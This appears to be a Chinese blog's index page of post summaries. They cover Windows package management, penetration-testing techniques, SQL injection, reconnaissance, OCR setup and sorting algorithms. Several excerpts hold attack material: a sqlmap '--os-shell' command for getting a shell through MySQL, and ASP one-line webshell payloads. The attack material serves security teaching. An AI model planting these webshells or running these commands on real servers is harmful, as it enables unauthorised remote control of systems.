摘要:
Windows包管理器 [TOC] Scoop "参考" 安装命令 Scoop 基础语法 从上面的命令中,我们可以发现 Scoop 命令的设计很简单(和 Homebrew 等 Unix style 的工具一样),是「 + 动作 + 对象」的语法。其中「对象」是可省略的。 最常用的几个基础动作有这些: 阅读全文
摘要:
我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。 利用http协议下载文件 利用vbs下载 将下面的代码保存为test.vbs 执行如下语句: cs 阅读全文
摘要:
"参考" "参考" 安装 windows: Linux: 使用 scan( host , port , args ) 方法 :以指定方式扫描指定主机或网段的指定端口 host : 要扫描的主机或网段,可以是一个单独的ip:192.168.10.10 ;也可以是一个小范围网段:192.168.10.1 阅读全文
摘要:
windows提权 1.通过sqlmap连接mysql获取shell (1)直接连接数据库 sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell (2)通过选择32位或者64位操作系统,获取webshell,执行 bash 阅读全文
摘要:
注入总结 参考链接 MYSQL 有时使用union注入时,会出现一些乱码,如下解决 convert(@@version using latin1) unhex(hex(@@version)) 注释符 井号(#) 双横线 (-- )后面要加一个空格 /**/ 局部注释 %00 直接截断字符串 `反引号 阅读全文
摘要:
一句话木马 asp <%execute(request("kxc"))%> <%eval request ("pass")%> <%eval request(chr(35))%> <%executerequest("YouPass")%> <%eval(request(“1″)):response. 阅读全文
摘要:
信息收集 1.IP信息 17CE 看是否存在cdn 存在的话,查找真实ip 从国外去访问,查看ip信息 去掉www,然后查看ip信息 2.旁站信息 webscan.cc 站长之家 3.C段信息 webscan.cc 站长之家 4.子域名信息 layer子域名挖掘机 subdomain 5.端口信息 阅读全文
摘要:
正确使用方法 1.tesseract orc安装 "tesseract ocr setup 3.05.00dev.exe下载" 2.pytesseract 3.设置 tesseract orc路径 将 添加到系统路径(路径因安装过程而异) 修改pytesseract.py文件 tesseract_c 阅读全文
摘要:
排序算法比较 比较排序和非比较排序 常见的排序算法都是比较排序,非比较排序包括计数排序、桶排序和基数排序,非比较排序对数据有要求,因为数据本身包含了定位特征,所有才能不通过比较来确定元素的位置。 比较排序的时间复杂度通常为O(n2)或者O(nlogn),比较排序的时间复杂度下界就是O(nlo 阅读全文